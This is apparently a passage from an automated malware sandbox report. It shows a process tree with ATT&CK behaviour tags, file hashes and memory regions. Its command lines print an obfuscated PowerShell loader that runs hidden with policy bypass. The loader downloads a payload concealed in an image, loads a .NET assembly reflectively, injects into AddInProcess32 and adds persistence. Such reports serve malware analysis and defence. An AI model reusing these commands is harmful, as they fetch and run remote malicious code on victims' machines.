⊩ ´eQBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBM䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´QQBz䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBi䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBP䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´S䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´Ec䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´E0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBW䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´SQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBv䷡ ㌝ ₋ ⊩ ´Gs䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´bgB1䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´WwBv䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ 
´d䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´F0䷡ ㌝ ₋ ⊩ ´XQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBj䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´DU䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´1䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´Dg䷡ ㌝ ₋ ⊩ ´LQBm䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´C0䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´Dc䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Dk䷡ ㌝ ₋ ⊩ ´MwBi䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZQBr䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´m䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´aQBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQ䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´D8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´NQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´cgBv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YgBp䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´LwBt䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´bwBw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´DI䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´cgBj䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´dg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´cwBp䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´YQBl䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´ZwBv䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´ZwBh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBz䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´YgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBm䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Lw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Qw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´U䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´ZwBy䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bQBE䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cwBv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ 
⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bk䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBQ䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´JwBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´aQB2䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('䷡ ㌝ ₋ ⊩ ´','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('cc8b59e3256f-a768-fbb4-9e70-d8e93bf2=nekot&aidem=tla?txt.1042028050mrowxyobihc/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'incurioso','AddInProcess32','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\incurioso.js"
          4⤵
            PID:4572
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3780
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4228,i,16315016104747277319,5510969007830467313,262144 --variations-seed-version --mojo-platform-channel-handle=4508 /prefetch:8
      1⤵
        PID:1556

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wogir5wf.deg.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1144-24-0x00000217CECC0000-0x00000217CEDE2000-memory.dmp

        Filesize

        1.1MB

      • memory/1440-22-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1440-32-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1440-23-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1440-12-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1440-0-0x00007FF947323000-0x00007FF947325000-memory.dmp

        Filesize

        8KB

      • memory/1440-11-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1440-1-0x0000021B799A0000-0x0000021B799C2000-memory.dmp

        Filesize

        136KB

      • memory/3780-34-0x0000000005F40000-0x00000000064E4000-memory.dmp

        Filesize

        5.6MB

      • memory/3780-33-0x00000000055A0000-0x000000000563C000-memory.dmp

        Filesize

        624KB

      • memory/3780-26-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/3780-35-0x00000000064F0000-0x0000000006582000-memory.dmp

        Filesize

        584KB

      • memory/3780-36-0x0000000005F30000-0x0000000005F3A000-memory.dmp

        Filesize

        40KB

      • memory/3780-37-0x0000000006750000-0x00000000067B6000-memory.dmp

        Filesize

        408KB

      • memory/3780-38-0x00000000071E0000-0x00000000072FE000-memory.dmp

        Filesize

        1.1MB

      • memory/3780-39-0x0000000007320000-0x0000000007674000-memory.dmp

        Filesize

        3.3MB

      • memory/3780-40-0x0000000007810000-0x000000000785C000-memory.dmp

        Filesize

        304KB

      • memory/3780-76-0x0000000007920000-0x0000000007942000-memory.dmp

        Filesize

        136KB